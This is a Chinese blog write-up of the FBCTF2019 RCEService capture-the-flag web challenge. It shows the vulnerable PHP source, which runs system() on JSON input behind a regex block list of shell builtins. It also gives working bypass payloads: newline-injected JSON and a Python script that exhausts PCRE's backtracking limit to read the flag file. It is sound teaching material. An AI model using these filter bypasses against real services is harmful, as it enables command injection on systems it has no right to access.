[FBCTF2019]RCEService

最新推荐文章于 2022-09-30 19:45:15 发布
最新推荐文章于 2022-09-30 19:45:15 发布
阅读量2.5k 收藏 3
点赞数 2
分类专栏: CTF刷题记录 文章标签: web CTF
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/RABCDXB/article/details/119306689
版权
本文详细介绍了如何利用PHP的PCRE回溯次数限制绕过安全限制,以解决一道Web安全挑战。通过多行输入和构造特定payload,成功执行cat命令获取文件内容。解题过程中涉及preg_match函数限制的规避以及命令注入的技巧。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

知识点:PHP利用PCRE回溯次数限制绕过某些安全限制,多行绕过preg_match函数

文章目录

解题过程

打开容器,题目显示需要以json的形式进行输入
在这里插入图片描述在先知上有题目源码:Facebook CTF 2019 - Web

<?php

putenv('PATH=/home/rceservice/jail');

if (isset($_REQUEST['cmd'])) {
  $json = $_REQUEST['cmd'];

  if (!is_string($json)) {
    echo 'Hacking attempt detected<br/><br/>';
  } elseif (preg_match('/^.*(alias|bg|bind|break|builtin|case|cd|command|compgen|complete|continue|declare|dirs|disown|echo|enable|eval|exec|exit|export|fc|fg|getopts|hash|help|history|if|jobs|kill|let|local|logout|popd|printf|pushd|pwd|read|readonly|return|set|shift|shopt|source|suspend|test|times|trap|type|typeset|ulimit|umask|unalias|unset|until|wait|while|[\x00-\x1FA-Z0-9!#-\/;-@\[-`|~\x7F]+).*$/', $json)) {
    echo 'Hacking attempt detected<br/><br/>';
  } else {
    echo 'Attempting to run command:<br/>';
    $cmd = json_decode($json, true)['cmd'];
    if ($cmd !== NULL) {
      system($cmd);
    } else {
      echo 'Invalid input';
    }
    echo '<br/><br/>';
  }
}

?>

审计之后,发现很多的函数都被禁止了。尝试一下json格式

{"cmd":"ls"}

在这里插入图片描述

第一种解法

因为preg_match只能匹配第一行,所以这里可以采用多行绕过。
因为putenv('PATH=/home/rceservice/jail');修改了环境变量,所以只能使用绝对路径使用cat命令,cat命令在/bin文件夹下
在这里插入图片描述

首先查看该目录下文件

?cmd={%0A"cmd":"ls /home/rceservice"%0A}

在这里插入图片描述而后cat命令读取文件内容,payload:

?cmd={%0A"cmd":"/bin/cat /home/rceservice/flag"%0A}

在这里插入图片描述

第二种解法

关于preg_match,有p神曾经讲的PRCE,但是这个题目复习环境是gat传参,而非post,会导致414报错,记录一下原题wp:

import requests

payload = '{"cmd":"/bin/cat /home/rceservice/flag","zz":"' + "a"*(1000000) + '"}'

res = requests.post("http://challenges.fbctf.com:8085/", data={"cmd":payload})
print(res.text)

参考链接

  1. Facebook CTF 2019 - Web
  2. p神:PHP利用PCRE回溯次数限制绕过某些安全限制
[ctf web][FBCTF2019]RCEService writeup + preg_match()绕过
ShenZ的博客
08-20 2920
[FBCTF2019]RCEService 知识点: preg_match(): 1.%0a换行绕过 2.正则(pcre)最大回溯绕过 putenv()函数 Setting an environment variable preg_match()绕过: 1.正则(pcre)最大回溯/递归限制 2.数组绕过 preg_match只能处理字符串,当传入的subject是数组时会返回false 3.%0a换行绕过 其实是正则书写不当 (1).不会匹配换行符 (2)非多行模式 putenv()函数:
BuuCTF [FBCTF2019]RCEService
Raners_的博客
02-24 283
这一步发现被过滤了。试了很多种方法,都没有找到可行的替代方法,上网查看wp,发现这道题还有源码?putenv已经把环境变量改了,所以只能通过输入cat在系统文件中的绝对路径才能使用。我是web的菜鸡,这第一篇博客就留给web吧,希望大佬们看到了轻点喷(...)preg_match函数只能检测第一行,所以需要绕过只需要用一个换行符即可。看到首页的JSON提示,准备构造JSON语句。操作,发现flag位于home/rceservice目录下。cat在/bin文件夹下,因此想要调用cat指令需要。
BUUCTFweb2[fbctf2019]rceservice 1
最新发布
04-03
### 关于 BUUCTF Web2 和 FBCTF 2019 RCEService 的挑战解析 #### 背景概述 在 CTF 比赛中,Web 类型的题目通常涉及 SQL 注入、命令执行、文件上传漏洞等多种攻击向量。对于提到的 **BUUCTF Web2** 和 **FBCTF 2019...
BUUCTF WEBRCESERVICE
qq_41696858的博客
03-02 598
首先这题没源码是万万做不出来的,反正我是不知道这源码从哪来的 先上源码 <?php putenv('PATH=/home/rceservice/jail'); if (isset($_REQUEST['cmd'])) { $json = $_REQUEST['cmd']; if (!is_string($json)) { echo 'Hacking attempt detected<br/><br/>'; } elseif (preg_match('/
BUU刷题记录②
Sapphire037的博客
08-24 396
[FBCTF2019]RCEService 不会做,看了wp不知道哪来的源码,用json格式传,知识点就是绕过preg_match的方法,回溯,数组(这题没用),换行符%0A [Zer0pts2020]Can you guess it? 进入页面得到源码 <?php include 'config.php'; // FLAG is defined in config.php if (preg_match('/config\.php\/*$/i', $_SERVER['PHP_SELF'])) {
[FBCTF2019]RCEService 1
plant1234的博客
09-30 961
首先打开题目根据测试发现用JSON格式可以命令执行:发现有正则匹配绕过。
评论 4
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值